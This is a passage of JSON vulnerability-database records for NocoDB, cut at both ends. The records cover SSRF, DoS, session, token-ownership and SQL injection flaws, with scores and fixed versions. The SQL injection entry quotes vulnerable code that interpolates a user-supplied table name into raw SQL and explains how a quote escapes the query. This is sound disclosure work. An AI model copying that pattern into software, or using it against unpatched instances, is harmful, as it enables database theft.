(bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28396","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.12999","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28396"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:16Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-x4vh-j75g-268g","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR
:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:16Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-x4vh-j75g-268g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28396","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28396"},{"reference_url":"https://github.com/advisories/GHSA-x4vh-j75g-268g","reference_id":"GHSA-x4vh-j75g-268g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x4vh-j75g-268g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28396","GHSA-x4vh-j75g-268g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vs5e-zmcs-8kam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35640?format=json","vulnerability_id":"VCID-x6m1-a44z-u3bd","summary":"Improper Input Validation in nocodb\nImproper Input Validation in GitHub repository nocodb/nocodb prior to 
0.96.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5104","reference_id":"","reference_type":"","scores":[{"value":"0.00816","scoring_system":"epss","scoring_elements":"0.74601","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5104"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/db0385cb8aab2a34e233454607f59152ac62b3e2","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-24T16:35:44Z/"}],"url":"https://github.com/nocodb/nocodb/commit/db0385cb8aab2a34e233454607f59152ac62b3e2"},{"reference_url":"https://huntr.dev/bounties/1b5c6d9f-941e-4dd7-a964-42b53d6826b0","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-24T16:35:44Z/"}],"url":"https://huntr.dev/bounties/1b5c6d9f-941e-4dd7-a964-42b53d6826b0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5104","reference
_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5104"},{"reference_url":"https://github.com/advisories/GHSA-xrpm-hccg-28x7","reference_id":"GHSA-xrpm-hccg-28x7","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-xrpm-hccg-28x7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67817?format=json","purl":"pkg:npm/nocodb@0.96.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.96.0"}],"aliases":["CVE-2023-5104","GHSA-xrpm-hccg-28x7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x6m1-a44z-u3bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53282?format=json","vulnerability_id":"VCID-x94j-rear-qub2","summary":"NocoDB information disclosure vulnerability\nIn NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. 
This allows attackers to make requests to internal servers and read the contents.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2062","reference_id":"","reference_type":"","scores":[{"value":"0.01251","scoring_system":"epss","scoring_elements":"0.79644","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2062"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/a18f5dd53811b9ec1c1bb2fdbfb328c0c87d7fb4","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/a18f5dd53811b9ec1c1bb2fdbfb328c0c87d7fb4"},{"reference_url":"https://huntr.dev/bounties/35593b4c-f127-4699-8ad3-f0b2203a8ef6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/35593b4c-f127-4699-8ad3-f0b2203a8ef6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2062","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2062"},{"reference_url":"https://github.com/advisories/GHSA-mx8q-jqwm-85mv","reference_id":"GHSA-mx8q-jqwm-85mv","referenc
e_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mx8q-jqwm-85mv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/95317?format=json","purl":"pkg:npm/nocodb@0.91.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ctkq-rnus-b7au"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-g4yf-skds-f3e8"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-xfv1-m6rg-5ka5"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.7"}],"aliases":["CVE-2022-2062","GHSA-mx8q-jqwm-85mv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x94j-rear-qub2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53269?format=json","vulnerability_id":"VCID-xfv1-m6rg-5ka5","summary":"Insufficient Session Expiration in NocoDB\nInsufficient Session Expiration in GitHub repository nocodb/nocodb prior to 
0.91.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2064","reference_id":"","reference_type":"","scores":[{"value":"0.00311","scoring_system":"epss","scoring_elements":"0.54468","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2064"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/c9b5111b25aea2781e19395a8e9107ddbd235a2b","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/c9b5111b25aea2781e19395a8e9107ddbd235a2b"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2262","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2338","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2338"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.91.9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":
"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.91.9"},{"reference_url":"https://huntr.dev/bounties/39523d51-fc5c-48b8-a082-171da79761bb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/39523d51-fc5c-48b8-a082-171da79761bb"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2064","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2064"},{"reference_url":"https://github.com/advisories/GHSA-6293-2vg2-pmp5","reference_id":"GHSA-6293-2vg2-pmp5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6293-2vg2-pmp5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/94585?format=json","purl":"pkg:npm/nocodb@0.91.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulne
rability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.9"}],"aliases":["CVE-2022-2064","GHSA-6293-2vg2-pmp5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xfv1-m6rg-5ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48695?format=json","vulnerability_id":"VCID-ycfk-e7rx-nqhc","summary":"NocoDB vulnerable to Denial of Service\nNocoDB prior to 0.92.0 allows actors to insert large characters into the input field `New Project` on the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3423","reference_id":"","reference_type":"","scores":[{"value":"0.01059","scoring_system":"epss","scoring_elements":"0.77926","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3423"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/000ecd886738b965b5997cd905825e3244f48b95","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/000ecd886738b965b5997cd905825e3244f48b95"},{"reference_url":"https://huntr.dev/bounties/94639d8e-8301-4432-ab80-e76e1346e631","reference_id":"","reference_type":"","scores":[{"value"
:"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/94639d8e-8301-4432-ab80-e76e1346e631"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3423","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3423"},{"reference_url":"https://github.com/advisories/GHSA-grv6-m753-3w2g","reference_id":"GHSA-grv6-m753-3w2g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-grv6-m753-3w2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/84203?format=json","purl":"pkg:npm/nocodb@0.92.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.92.0"}],"aliases":["CVE-2022-3423","GHSA-grv6-m753-3w2g"],"risk_score":null,"exploitability":null,"weighte
d_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ycfk-e7rx-nqhc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14591?format=json","vulnerability_id":"VCID-ykcq-ue1s-xbd5","summary":"NocoDB SQL Injection vulnerability\n### Summary\n---\nAn authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.\n\n### Details\n---\n### SQL Injection vulnerability occurs in **VitessClient.ts**.\n```javascript\nasync columnList(args: any = {}) {\n    const func = this.columnList.name;\n    const result = new Result();\n    log.api(`${func}:args:`, args);\n\n    try {\n      args.databaseName = this.connectionConfig.connection.database;\n\n      const response = await this.sqlClient.raw(\n        `select *, table_name as tn from information_schema.columns where table_name = '${args.tn}' ORDER by ordinal_position`,\n      );\n```\nThe variable **${args.tn}** refers to the table name entered by the user.\nA malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.\n\n### Impact\n---\nThis vulnerability may result in leakage of sensitive data in the 
database.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-50718","reference_id":"","reference_type":"","scores":[{"value":"0.00231","scoring_system":"epss","scoring_elements":"0.45977","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-50718"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-13T20:17:19Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-50718","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-50718"},{"reference_url":"https://github.com/advisories/GHSA-8fxg-mr34-jqr8","reference_id":"GHSA-8fxg-mr34-jqr8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fxg-mr34-jqr8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41780?format=json","purl":"pkg:npm/noco
db@0.202.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.202.10"}],"aliases":["CVE-2023-50718","GHSA-8fxg-mr34-jqr8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykcq-ue1s-xbd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21300?format=json","vulnerability_id":"VCID-z9nq-zv94-syhg","summary":"NocoDB Missing Ownership Validation in MCP Token Operations\n### Summary\nThe MCP token service did not validate token ownership, allowing a Creator within the same base to read, regenerate, or delete another user's MCP tokens if the token ID was known.\n\n### Details\n`McpTokenService.get()`, `regenerateToken()`, and `delete()` did not filter by `fk_user_id`. The analogous `ApiTokensService` correctly enforced ownership.\n\n### Impact\nLimited — requires Creator role and knowledge of target token ID. 
Primary risk is denial of service (invalidating tokens) and scoped token disclosure.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) (bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28361","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17046","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28361"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:48Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-p9x3-w98f-7j3q","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:57:48Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-p9x3-w98f-7j3
q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28361","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28361"},{"reference_url":"https://github.com/advisories/GHSA-p9x3-w98f-7j3q","reference_id":"GHSA-p9x3-w98f-7j3q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p9x3-w98f-7j3q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{